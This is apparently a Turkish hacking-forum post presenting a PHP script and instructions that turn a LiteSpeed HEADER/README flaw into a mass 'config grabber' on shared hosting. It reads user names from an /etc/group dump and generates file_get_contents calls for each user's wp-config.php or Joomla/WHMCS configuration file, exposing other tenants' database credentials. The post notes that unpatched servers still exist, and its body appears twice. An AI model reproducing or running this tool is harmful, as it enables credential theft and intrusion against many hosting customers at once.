LiteSpeed HEADER , README açığını biliyorsunuz bilmeyenler için videolu anlatımını tekrar aşağıya bırakıyım. bilmeyenler önce izlesin sonra okusun.
Bu açığı kullanırken config bilgilerini tek tek çekmek adeta zulum gibi oluyor, ben ufak bir kod parçacığı ile bunu mass hale getirdim.
lite.php olarak kayıt ediniz.
lite.php içindeki wp-config.php kısmını siz sunucudaki hedeflediğiniz scripte göre değişebilirsiniz, Joomla için configuration.php yapabilirsiniz, bu aynı zamanda whmcs hosting yönetim scriptininde config adıdır. wordpress için wp-config.php şeklinde kalabilir.
cat/etc/group komutu ile user adlarını alıyoruz ve dizinimizde dosya.txt adında bir TXT dosyası oluşturup, komut satırından aldığımız group çıktılarını kayıt ediyoruz. sonrasında lite.php olarak kayıt ettiğimiz dosyayı açıyoruz ve karşımızda sunucudaki bütün tahmini config yolları sıralanıyor, lite.php dekilerin hepsini kopyalayıp HEADER dosyamızın içine kayıt ediyoruz. Sonrasında ise HEADER yüklü klasörümüzü açtığımız anda yüzlerce configi alt alta sıralı şekilde görüyoruz, bize zaman kazancı sağlıyor.
Bir nevi config grabber'in basitleştirilmiş hali diyelim.
Biliyorum bukadar detaylı anlatmak banada sıkıcı gelsede belki bu aşamaları bilmeyenler için detaylı yazdım
not: hala güncellenmemiş litespeed serverlar mevcut.
Bu açığı kullanırken config bilgilerini tek tek çekmek adeta zulum gibi oluyor, ben ufak bir kod parçacığı ile bunu mass hale getirdim.
lite.php olarak kayıt ediniz.
PHP:
<?php
$file = fopen("dosya.txt",'r');
while(!feof($file)){
$satir = fgets($file);
$as = substr($satir, 0, 7);
echo "echo file_get_contents('/home/$as/public_html/wp-config.php'); <br />"; //
}
fclose($file);
?>
lite.php içindeki wp-config.php kısmını siz sunucudaki hedeflediğiniz scripte göre değişebilirsiniz, Joomla için configuration.php yapabilirsiniz, bu aynı zamanda whmcs hosting yönetim scriptininde config adıdır. wordpress için wp-config.php şeklinde kalabilir.
cat/etc/group komutu ile user adlarını alıyoruz ve dizinimizde dosya.txt adında bir TXT dosyası oluşturup, komut satırından aldığımız group çıktılarını kayıt ediyoruz. sonrasında lite.php olarak kayıt ettiğimiz dosyayı açıyoruz ve karşımızda sunucudaki bütün tahmini config yolları sıralanıyor, lite.php dekilerin hepsini kopyalayıp HEADER dosyamızın içine kayıt ediyoruz. Sonrasında ise HEADER yüklü klasörümüzü açtığımız anda yüzlerce configi alt alta sıralı şekilde görüyoruz, bize zaman kazancı sağlıyor.
Bir nevi config grabber'in basitleştirilmiş hali diyelim.
Biliyorum bukadar detaylı anlatmak banada sıkıcı gelsede belki bu aşamaları bilmeyenler için detaylı yazdım
not: hala güncellenmemiş litespeed serverlar mevcut.